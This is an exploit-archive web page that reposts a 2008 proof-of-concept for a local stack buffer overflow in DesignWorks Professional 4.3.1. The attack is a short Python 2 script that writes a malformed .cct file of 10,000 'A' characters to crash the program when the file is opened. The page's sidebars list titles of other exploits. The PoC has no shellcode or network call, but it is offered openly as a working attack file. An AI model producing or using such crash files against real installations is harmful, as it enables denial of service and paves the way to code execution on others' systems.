首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DesignWorks Professional 4.3.1 Local .CCT File Stack BOF PoC
来源:www.vfcocus.net 作者:Cn4phux 发布时间:2008-12-07  
#
#                          I'm Cn4phux
#                  ------  |      ______ _____   (--, __*__  ______
#                  |____|  |  ¤   |    | |       | ! )  |    |     |
#                [ |    |` |      | <> | |-----> |__/   |    |  ¤  | ]
#                  | .. |  |____! |____| |____   |\     |    |-----|
#                                      |        _| \  -----  | ::: |
#                                      |         |  \
#                                |_____|         |   \
#                                                |
#                                                |
#                                               ,|.
#                                              / | \
#                                             |  |  |
#                                             |  _  |
#                                           `._\/.\/_,'
#                                             _( 8 )_
#                                            / '_ _' \
#                                           |  /{_}\  |
#                                           ` |  "  | `
#                                             |     |
#
#
# [+] Application               : DesignWorks Professional 4.3.1
#
# [+] Application's Description : (" DesignWorks Professional Schematic Capture for Windows...,Google-it.)
#
# [+] Bug                       : Local .CCT File Stack Buffer Overflow (PoC)
#
# [+] Author                    : Cn4phux
#
import sys
import os
print "[x] Local Stack Overflow PoC"
try:
   milef = open("x2.cct",'w')
 
except IOError, e:
    print "Unable to open file ", e
    sys.exit(0)
print "[x] File sucessfully opened for writing."
try:
   milef.write("A" * 10000)
except IOError, e:
  
    print "Unable to write to file ", e
    sys.exit(0)
  
print "[x] Exploit successfully written."
milef.close()
print "[x] ."
print "\n[x] Cn4phux made in DZ, Great'z to all Algerians. /Google.dz"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IPNPro3 <= 1.44 Admin Password
·Visagesoft eXPert PDF EditorX
·DL PayCart <= 1.34 Admin Passw
·NULL FTP Server 1.1.0.7 SITE P
·Bonza Cart <= 1.10 Admin Passw
·EiD <= 0.92 Malformed PE File
·PayPal eStore Admin Password C
·w3blabor CMS 3.0.5 Arbitrary F
·ccTiddly 1.7.4 (cct_base) Mult
·MG2 0.5.1 (filename) Remote Co
·SIU Guarani Multiple Remote Vu
·RadAsm <= 2.2.1.4 (.RAP File)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved